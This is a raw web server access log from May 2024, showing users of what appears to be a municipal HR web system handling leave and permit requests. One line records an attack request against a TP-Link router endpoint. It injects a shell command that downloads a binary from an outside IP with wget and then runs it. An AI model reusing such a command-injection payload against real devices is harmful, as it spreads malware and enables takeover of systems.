200.54.103.162 - - [15/May/2024:10:14:32 -0300] "POST /cormun/servlet/hlogin?969f61f8cff9debe506a788c128eb944,gx-no-cache=1715778730962 HTTP/1.1" 200 90
190.171.144.234 - - [15/May/2024:10:14:42 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10193
190.171.143.98 - - [15/May/2024:10:14:44 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1714
200.54.103.162 - - [15/May/2024:10:14:58 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 947
200.54.103.162 - - [15/May/2024:10:14:58 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4339
200.54.103.162 - - [15/May/2024:10:15:02 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13304
190.171.149.74 - - [15/May/2024:10:17:54 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
200.54.103.162 - - [15/May/2024:10:17:57 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 500 10
190.171.143.98 - - [15/May/2024:10:18:15 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1714
181.212.40.185 - - [15/May/2024:10:18:24 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 500 10
190.171.141.138 - - [15/May/2024:10:18:41 -0300] "GET /cormun/servlet/trpermisosadjuntos?16492844,20240513175631,P, HTTP/1.1" 200 5443
181.212.40.185 - - [15/May/2024:10:18:54 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
181.212.40.185 - - [15/May/2024:10:18:54 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.141.138 - - [15/May/2024:10:19:11 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.171.141.138 - - [15/May/2024:10:19:11 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1729
181.212.40.185 - - [15/May/2024:10:19:11 -0300] "POST /cormun/servlet/hlogin?4f202a6bf120170efb59d259cbe813c0,gx-no-cache=1715779005151 HTTP/1.1" 200 90
190.171.141.138 - - [15/May/2024:10:19:14 -0300] "POST /cormun/servlet/hlogin?47dc4a1c15e64cb7a5eb689074da333b,gx-no-cache=1715779013368 HTTP/1.1" 200 90
181.212.40.185 - - [15/May/2024:10:19:20 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 958
190.171.141.138 - - [15/May/2024:10:19:27 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 982
190.171.141.138 - - [15/May/2024:10:19:45 -0300] "GET /cormun/servlet/trpermisosadjuntos?16492844,20240513175631,P, HTTP/1.1" 200 6633
190.171.141.138 - - [15/May/2024:10:19:49 -0300] "GET /cormun/servlet/permisosadjuntos?INS,16492844,P,20240513175631,, HTTP/1.1" 200 6115
190.171.141.138 - - [15/May/2024:10:20:02 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.40.185 - - [15/May/2024:10:20:04 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 19445
190.171.153.34 - - [15/May/2024:10:20:59 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1719
190.171.153.34 - - [15/May/2024:10:21:33 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?2294816 HTTP/1.1" 200 24576
190.171.153.34 - - [15/May/2024:10:22:48 -0300] "POST /cormun/servlet/hlogin?e202c6b8383f779780a4da5017d125a5,gx-no-cache=1715779213880 HTTP/1.1" 200 90
190.171.153.34 - - [15/May/2024:10:22:48 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 987
190.171.153.34 - - [15/May/2024:10:22:49 -0300] "GET /cormun/servlet/trlicenciaspermisosadjuntos?17378428,20240515000000,L, HTTP/1.1" 200 6748
190.171.153.34 - - [15/May/2024:10:22:49 -0300] "GET /cormun/static/Shared/ext/resources/css/ext-all.css?205870 HTTP/1.1" 206 1
190.171.153.34 - - [15/May/2024:10:22:49 -0300] "GET /cormun/static/gxui/gxui-all.css?110300 HTTP/1.1" 206 1
190.171.153.34 - - [15/May/2024:10:22:49 -0300] "GET /cormun/static/calendar-system.css?75620 HTTP/1.1" 206 1
190.171.153.34 - - [15/May/2024:10:22:51 -0300] "GET /cormun/static/gxui/gxui-all.css?110300 HTTP/1.1" 206 946
190.171.153.34 - - [15/May/2024:10:22:51 -0300] "GET /cormun/static/calendar-system.css?75620 HTTP/1.1" 206 4339
190.171.153.34 - - [15/May/2024:10:22:51 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?2294816 HTTP/1.1" 206 1
190.171.153.34 - - [15/May/2024:10:22:56 -0300] "GET /cormun/static/Shared/ext/resources/css/ext-all.css?205870 HTTP/1.1" 200 16384
190.171.153.34 - - [15/May/2024:10:23:03 -0300] "GET /cormun/static/gxcfg.js?201991422445549 HTTP/1.1" 200 953
190.171.153.34 - - [15/May/2024:10:23:03 -0300] "GET /cormun/static/trlicenciaspermisosadjuntos.js?20199142244593 HTTP/1.1" 200 21036
190.171.153.34 - - [15/May/2024:10:23:05 -0300] "GET /cormun/static/Shared/ext/resources/css/ext-all.css?205870 HTTP/1.1" 206 414816
181.212.40.185 - - [15/May/2024:10:23:25 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 19441
190.171.141.82 - - [15/May/2024:10:23:37 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 6328
190.171.141.82 - - [15/May/2024:10:23:37 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1741
190.171.141.82 - - [15/May/2024:10:23:41 -0300] "POST /cormun/servlet/hlogin?3fe62c3f0de2b2c0501cec500cf7e5ae,gx-no-cache=1715779280586 HTTP/1.1" 200 90
190.171.141.82 - - [15/May/2024:10:23:41 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 960
190.171.141.82 - - [15/May/2024:10:23:41 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 7361
190.171.153.34 - - [15/May/2024:10:23:44 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?2294816 HTTP/1.1" 206 93784
190.171.153.34 - - [15/May/2024:10:23:53 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 12034
190.171.153.34 - - [15/May/2024:10:24:01 -0300] "GET /cormun/servlet/trlicenciaspermisosadjuntos?17378428,20240515000000,L, HTTP/1.1" 200 6746
190.171.153.34 - - [15/May/2024:10:24:06 -0300] "GET /cormun/servlet/licenciaspermisosadjuntos?INS,17378428,L,20240515000000,, HTTP/1.1" 200 6018
190.171.141.82 - - [15/May/2024:10:24:08 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 16308
190.171.141.82 - - [15/May/2024:10:24:08 -0300] "GET /cormun/static/gxcfg.js?20221129840861 HTTP/1.1" 200 953
190.171.153.34 - - [15/May/2024:10:24:09 -0300] "GET /cormun/static/gxcfg.js?20201215114875 HTTP/1.1" 200 953
190.171.141.82 - - [15/May/2024:10:24:12 -0300] "GET /cormun/static/solicitudot.js?20221129840983 HTTP/1.1" 200 74072
190.171.153.34 - - [15/May/2024:10:24:13 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.153.34 - - [15/May/2024:10:24:13 -0300] "GET /cormun/static/licenciaspermisosadjuntos.js?20201215114932 HTTP/1.1" 200 8760
190.171.141.82 - - [15/May/2024:10:24:35 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 7361
190.171.141.82 - - [15/May/2024:10:24:36 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1725
190.171.153.34 - - [15/May/2024:10:24:52 -0300] "POST /cormun/servlet/licenciaspermisosadjuntos?e202c6b8383f779780a4da5017d125a5,INS,17378428,L,20240515000000,, HTTP/1.1" 200 116
190.171.153.34 - - [15/May/2024:10:24:53 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1042
190.171.141.82 - - [15/May/2024:10:24:53 -0300] "POST /cormun/servlet/hlogin?3fe62c3f0de2b2c0501cec500cf7e5ae,gx-no-cache=1715779339897 HTTP/1.1" 200 90
190.171.141.82 - - [15/May/2024:10:24:55 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 960
190.171.141.82 - - [15/May/2024:10:24:59 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 7361
167.94.138.119 - - [15/May/2024:10:25:09 -0300] "GET / HTTP/1.1" 200 11217
190.171.153.34 - - [15/May/2024:10:25:12 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1042
167.94.138.119 - - [15/May/2024:10:25:13 -0300] "GET / HTTP/1.1" 200 11217
190.171.153.34 - - [15/May/2024:10:25:14 -0300] "GET /cormun/servlet/trlicenciaspermisosadjuntos?17378428,20240515000000,L, HTTP/1.1" 200 7253
167.94.138.119 - - [15/May/2024:10:25:30 -0300] "PRI * HTTP/2.0" 505 -
190.171.153.34 - - [15/May/2024:10:25:33 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 12038
167.94.138.119 - - [15/May/2024:10:25:35 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.141.138 - - [15/May/2024:10:27:09 -0300] "GET /cormun/servlet/permisosadjuntos?INS,16492844,P,20240513175631,, HTTP/1.1" 200 6114
190.171.141.138 - - [15/May/2024:10:27:09 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.141.138 - - [15/May/2024:10:27:21 -0300] "POST /cormun/servlet/permisosadjuntos?47dc4a1c15e64cb7a5eb689074da333b,INS,16492844,P,20240513175631,, HTTP/1.1" 200 116
190.171.141.138 - - [15/May/2024:10:27:21 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1036
107.178.238.61 - - [15/May/2024:10:27:21 -0300] "GET / HTTP/1.1" 200 11217
190.171.141.138 - - [15/May/2024:10:27:22 -0300] "GET /cormun/servlet/trpermisosadjuntos?16492844,20240513175631,P, HTTP/1.1" 200 7194
190.171.141.138 - - [15/May/2024:10:27:26 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 17029
190.171.141.138 - - [15/May/2024:10:27:32 -0300] "POST /cormun/servlet/trpermisosgoce?47dc4a1c15e64cb7a5eb689074da333b,,gx-no-cache=1715779510790 HTTP/1.1" 200 14139
190.171.141.138 - - [15/May/2024:10:27:34 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.138 - - [15/May/2024:10:27:34 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.141.138 - - [15/May/2024:10:27:34 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.141.138 - - [15/May/2024:10:27:34 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.141.138 - - [15/May/2024:10:27:35 -0300] "GET /cormun/servlet/trpermisosadjuntos?15214601,20240513102333,P, HTTP/1.1" 200 6638
190.171.141.138 - - [15/May/2024:10:27:37 -0300] "GET /cormun/servlet/trpermisosadjuntos?15214601,20240513102333,P, HTTP/1.1" 200 6638
190.171.141.138 - - [15/May/2024:10:27:38 -0300] "GET /cormun/servlet/permisosadjuntos?INS,15214601,P,20240513102333,, HTTP/1.1" 200 6120
190.171.141.138 - - [15/May/2024:10:27:38 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.141.138 - - [15/May/2024:10:27:52 -0300] "POST /cormun/servlet/permisosadjuntos?47dc4a1c15e64cb7a5eb689074da333b,INS,15214601,P,20240513102333,, HTTP/1.1" 200 116
190.171.141.138 - - [15/May/2024:10:27:55 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1036
190.171.141.138 - - [15/May/2024:10:27:57 -0300] "GET /cormun/servlet/trpermisosadjuntos?15214601,20240513102333,P, HTTP/1.1" 200 7201
190.171.141.138 - - [15/May/2024:10:28:05 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 17030
190.171.141.138 - - [15/May/2024:10:28:14 -0300] "POST /cormun/servlet/trpermisosgoce?47dc4a1c15e64cb7a5eb689074da333b,,gx-no-cache=1715779554790 HTTP/1.1" 200 14130
190.171.141.138 - - [15/May/2024:10:28:15 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.141.138 - - [15/May/2024:10:28:15 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.138 - - [15/May/2024:10:28:15 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.141.138 - - [15/May/2024:10:28:15 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.153.34 - - [15/May/2024:10:28:17 -0300] "GET /cormun/servlet/trlicenciaspermisosadjuntos?17378428,20240515000000,L, HTTP/1.1" 200 7249
190.171.141.138 - - [15/May/2024:10:28:20 -0300] "GET /cormun/servlet/trpermisosadjuntos?18015264,20240515083341,P, HTTP/1.1" 200 6635
190.171.153.34 - - [15/May/2024:10:28:25 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 12038
190.171.141.138 - - [15/May/2024:10:28:28 -0300] "GET /cormun/servlet/permisosadjuntos?INS,18015264,P,20240515083341,, HTTP/1.1" 200 6118
190.171.141.138 - - [15/May/2024:10:28:28 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.141.138 - - [15/May/2024:10:28:39 -0300] "POST /cormun/servlet/permisosadjuntos?47dc4a1c15e64cb7a5eb689074da333b,INS,18015264,P,20240515083341,, HTTP/1.1" 200 116
190.171.141.138 - - [15/May/2024:10:28:39 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1037
190.171.141.138 - - [15/May/2024:10:28:39 -0300] "GET /cormun/servlet/trpermisosadjuntos?18015264,20240515083341,P, HTTP/1.1" 200 7195
190.171.141.138 - - [15/May/2024:10:28:43 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 17024
190.171.141.138 - - [15/May/2024:10:28:48 -0300] "POST /cormun/servlet/trpermisosgoce?47dc4a1c15e64cb7a5eb689074da333b,,gx-no-cache=1715779587942 HTTP/1.1" 200 14073
190.171.141.138 - - [15/May/2024:10:29:58 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 8707
190.171.141.138 - - [15/May/2024:10:30:01 -0300] "POST /cormun/servlet/trautorizarpermisogoce?47dc4a1c15e64cb7a5eb689074da333b,,gx-no-cache=1715779661396 HTTP/1.1" 200 5573
190.171.141.138 - - [15/May/2024:10:30:02 -0300] "POST /cormun/servlet/trautorizarpermisogoce?47dc4a1c15e64cb7a5eb689074da333b,,gx-no-cache=1715779662147 HTTP/1.1" 200 5302
190.171.141.138 - - [15/May/2024:10:30:03 -0300] "POST /cormun/servlet/trautorizarpermisogoce?47dc4a1c15e64cb7a5eb689074da333b,,gx-no-cache=1715779662955 HTTP/1.1" 200 4548
190.171.141.138 - - [15/May/2024:10:30:05 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15027
190.171.141.138 - - [15/May/2024:10:30:09 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 16965
190.171.153.34 - - [15/May/2024:10:30:23 -0300] "POST /cormun/servlet/trlicencias?e202c6b8383f779780a4da5017d125a5,,gx-no-cache=1715779682661 HTTP/1.1" 200 9184
190.171.153.34 - - [15/May/2024:10:30:23 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.153.34 - - [15/May/2024:10:30:23 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.153.34 - - [15/May/2024:10:30:24 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.153.34 - - [15/May/2024:10:30:24 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.152.114 - - [15/May/2024:10:31:59 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
190.171.152.114 - - [15/May/2024:10:32:18 -0300] "POST /cormun/servlet/hlogin?ab1002c712e7bef6f51421e0e14be222,gx-no-cache=1715779792078 HTTP/1.1" 200 90
190.171.152.114 - - [15/May/2024:10:33:10 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 954
190.171.152.114 - - [15/May/2024:10:33:17 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4332
190.171.152.114 - - [15/May/2024:10:33:52 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13709
190.171.143.98 - - [15/May/2024:10:34:50 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1714
190.171.143.98 - - [15/May/2024:10:34:57 -0300] "POST /cormun/servlet/hlogin?5101e0c8fcd80ad0476ffdcad698dc43,gx-no-cache=1715779957348 HTTP/1.1" 200 90
190.171.143.98 - - [15/May/2024:10:34:57 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 945
190.171.143.98 - - [15/May/2024:10:34:58 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4307
190.171.143.98 - - [15/May/2024:10:35:02 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11579
190.171.149.74 - - [15/May/2024:10:37:43 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.171.142.50 - - [15/May/2024:10:44:13 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 6045
190.171.142.50 - - [15/May/2024:10:44:13 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1737
190.171.142.50 - - [15/May/2024:10:44:13 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 6043
190.171.142.50 - - [15/May/2024:10:44:20 -0300] "POST /cormun/servlet/hlogin?bb8d5c14c045ad2f73c9a8f3409b4537,gx-no-cache=1715780519516 HTTP/1.1" 200 90
190.171.142.50 - - [15/May/2024:10:44:20 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.142.50 - - [15/May/2024:10:44:20 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 12450
190.171.141.106 - - [15/May/2024:10:45:16 -0300] "POST /cormun/servlet/trlicencias?5672f838f21ed29b85fc5c5ca240ee18,,gx-no-cache=1715780577013 HTTP/1.1" 440 972
190.171.141.106 - - [15/May/2024:10:45:17 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6036
190.171.141.106 - - [15/May/2024:10:45:18 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1728
190.171.141.106 - - [15/May/2024:10:45:21 -0300] "POST /cormun/servlet/hlogin?b31360e1cfa13069b793fdc189c2d298,gx-no-cache=1715780582448 HTTP/1.1" 200 90
190.171.141.106 - - [15/May/2024:10:45:21 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 948
190.171.141.106 - - [15/May/2024:10:45:22 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 13897
200.54.103.162 - - [15/May/2024:10:46:42 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4326
200.54.103.162 - - [15/May/2024:10:46:42 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.152.114 - - [15/May/2024:10:46:44 -0300] "GET /cormun/servlet/licenciaspermisos?INS,0,,, HTTP/1.1" 200 7946
190.171.152.114 - - [15/May/2024:10:46:44 -0300] "GET /cormun/static/gxcfg.js?202012153173 HTTP/1.1" 200 953
190.171.152.114 - - [15/May/2024:10:46:44 -0300] "GET /cormun/static/licenciaspermisos.js?2020121532136 HTTP/1.1" 200 38753
200.54.103.162 - - [15/May/2024:10:46:46 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15223
200.54.103.162 - - [15/May/2024:10:46:46 -0300] "GET /cormun/static/gxcfg.js?2020121631564 HTTP/1.1" 200 953
200.54.103.162 - - [15/May/2024:10:46:46 -0300] "GET /cormun/static/trpermisosgoce.js?2020121633681 HTTP/1.1" 200 35904
200.54.103.162 - - [15/May/2024:10:46:46 -0300] "GET /cormun//static/Resources/PXToolsGridDelete.png HTTP/1.1" 200 538
200.54.103.162 - - [15/May/2024:10:46:53 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7233
200.54.103.162 - - [15/May/2024:10:46:53 -0300] "GET /cormun/static/gxcfg.js?20201215124560 HTTP/1.1" 200 953
200.54.103.162 - - [15/May/2024:10:46:53 -0300] "GET /cormun/static/permisogoce.js?20201215124939 HTTP/1.1" 200 27790
200.54.103.162 - - [15/May/2024:10:47:00 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a93f440710845850170bd04adbb15ddc942635b85c4a2b125494826ada634a171660beabddc0741334a8ce94affbcafae4,gx-no-cache=1715780679635 HTTP/1.1" 200 76
200.54.103.162 - - [15/May/2024:10:47:00 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
200.54.103.162 - - [15/May/2024:10:47:04 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a975fad4815badb163f2edda43a06de2c63d52671328edf607eb9eed14360d20a0239420bcdc6a3104b1ea76e9d68d9b5c,gx-no-cache=1715780683825 HTTP/1.1" 200 48
200.54.103.162 - - [15/May/2024:10:47:07 -0300] "POST /cormun/servlet/permisogoce?969f61f8cff9debe506a788c128eb944,INS,0,,,,gx-no-cache=1715780685580 HTTP/1.1" 200 93
200.54.103.162 - - [15/May/2024:10:47:07 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1006
200.54.103.162 - - [15/May/2024:10:47:07 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15492
200.54.103.162 - - [15/May/2024:10:47:07 -0300] "GET /cormun//static/Resources/PXToolsGridUpdate.png HTTP/1.1" 200 470
200.54.103.162 - - [15/May/2024:10:47:12 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7233
200.54.103.162 - - [15/May/2024:10:47:19 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a9bedd10705bc373c977d9fda6f61feb9d2635b85c4a2b125494826ada634a171660beabddc0741334a8ce94affbcafae4,gx-no-cache=1715780698938 HTTP/1.1" 200 77
200.54.103.162 - - [15/May/2024:10:47:27 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a9b76557ad61afe6397f78817e465e00cd4b9e025b08536894d48e91e1a5f51c74239420bcdc6a3104b1ea76e9d68d9b5c,gx-no-cache=1715780706296 HTTP/1.1" 200 47
200.54.103.162 - - [15/May/2024:10:47:29 -0300] "POST /cormun/servlet/permisogoce?969f61f8cff9debe506a788c128eb944,INS,0,,,,gx-no-cache=1715780708563 HTTP/1.1" 200 93
200.54.103.162 - - [15/May/2024:10:47:29 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1006
200.54.103.162 - - [15/May/2024:10:47:29 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15700
200.54.103.162 - - [15/May/2024:10:47:36 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7233
200.54.103.162 - - [15/May/2024:10:47:46 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a9acf4b276cd29af1651dbe44236472d4f2635b85c4a2b125494826ada634a171660beabddc0741334a8ce94affbcafae4,gx-no-cache=1715780725210 HTTP/1.1" 200 83
200.54.103.162 - - [15/May/2024:10:47:50 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a99bd9f356684ee5fc5716b544af3b1ace289ac1507686b495fdcb5e154964b6bd239420bcdc6a3104b1ea76e9d68d9b5c,gx-no-cache=1715780729536 HTTP/1.1" 200 48
200.54.103.162 - - [15/May/2024:10:47:52 -0300] "POST /cormun/servlet/permisogoce?969f61f8cff9debe506a788c128eb944,INS,0,,,,gx-no-cache=1715780731427 HTTP/1.1" 200 93
200.54.103.162 - - [15/May/2024:10:47:52 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1006
200.54.103.162 - - [15/May/2024:10:47:52 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15927
200.54.103.162 - - [15/May/2024:10:47:59 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7232
200.54.103.162 - - [15/May/2024:10:48:07 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a998887ba1bd2a301df92c8c135d4c41982635b85c4a2b125494826ada634a171660beabddc0741334a8ce94affbcafae4,gx-no-cache=1715780746474 HTTP/1.1" 200 78
200.54.103.162 - - [15/May/2024:10:48:14 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a901f0f909219b5d7b5dbb40859ff9fc0542257885838d5bca79d62f79d8dce266239420bcdc6a3104b1ea76e9d68d9b5c,gx-no-cache=1715780753192 HTTP/1.1" 200 49
200.54.103.162 - - [15/May/2024:10:48:16 -0300] "POST /cormun/servlet/permisogoce?969f61f8cff9debe506a788c128eb944,INS,0,,,,gx-no-cache=1715780755331 HTTP/1.1" 200 93
200.54.103.162 - - [15/May/2024:10:48:16 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1006
200.54.103.162 - - [15/May/2024:10:48:16 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 16119
190.171.142.10 - - [15/May/2024:10:48:35 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1725
190.171.142.10 - - [15/May/2024:10:48:36 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1735
200.54.103.162 - - [15/May/2024:10:48:39 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7233
190.171.142.10 - - [15/May/2024:10:48:40 -0300] "POST /cormun/servlet/hlogin?e1386050dfc567cc8aa386da3e0dd311,gx-no-cache=1715780779090 HTTP/1.1" 200 90
190.171.142.10 - - [15/May/2024:10:48:40 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 954
190.171.142.10 - - [15/May/2024:10:48:41 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4205
190.171.142.10 - - [15/May/2024:10:48:43 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 7420
190.171.142.10 - - [15/May/2024:10:48:43 -0300] "GET /cormun/static/gxcfg.js?20221129846531 HTTP/1.1" 200 953
190.171.142.10 - - [15/May/2024:10:48:43 -0300] "GET /cormun/static/trsolicitudot.js?202211298465651 HTTP/1.1" 200 54040
200.54.103.162 - - [15/May/2024:10:48:49 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a96eeca5af4eeee0698689ba28117267942635b85c4a2b125494826ada634a171660beabddc0741334a8ce94affbcafae4,gx-no-cache=1715780789035 HTTP/1.1" 200 226
200.54.103.162 - - [15/May/2024:10:48:49 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
200.54.103.162 - - [15/May/2024:10:48:49 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
200.54.103.162 - - [15/May/2024:10:48:50 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
200.54.103.162 - - [15/May/2024:10:48:50 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
190.171.152.114 - - [15/May/2024:10:49:08 -0300] "GET /cormun/servlet/licenciaspermisos?38c37ee1c5b57c7ff3fb4995b3162a18c2a558864b74f726458484028456a361c35caa763332e2f2da38e4045bfa0e9abf0aa9c9b726ddc9f5001d5783721a41,gx-no-cache=1715780809177 HTTP/1.1" 200 103
190.171.152.114 - - [15/May/2024:10:49:08 -0300] "POST /cormun/servlet/licenciaspermisos?ab1002c712e7bef6f51421e0e14be222,INS,0,,,,gx-no-cache=1715780809214 HTTP/1.1" 200 5130
45.142.182.70 - - [15/May/2024:10:49:24 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://14.225.204.172/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 1013
190.171.152.114 - - [15/May/2024:10:49:27 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
200.54.103.162 - - [15/May/2024:10:49:34 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a9b46520edd81ba8005adacff11d590ab42635b85c4a2b125494826ada634a171660beabddc0741334a8ce94affbcafae4,gx-no-cache=1715780833345 HTTP/1.1" 200 73
200.54.103.162 - - [15/May/2024:10:49:40 -0300] "GET /cormun/servlet/permisogoce?f7834beef20199b2b8de904b567183a95fb35daea73e25668bb621febe0874ec63a402112b725c9978089a95235a856d239420bcdc6a3104b1ea76e9d68d9b5c,gx-no-cache=1715780840129 HTTP/1.1" 200 47
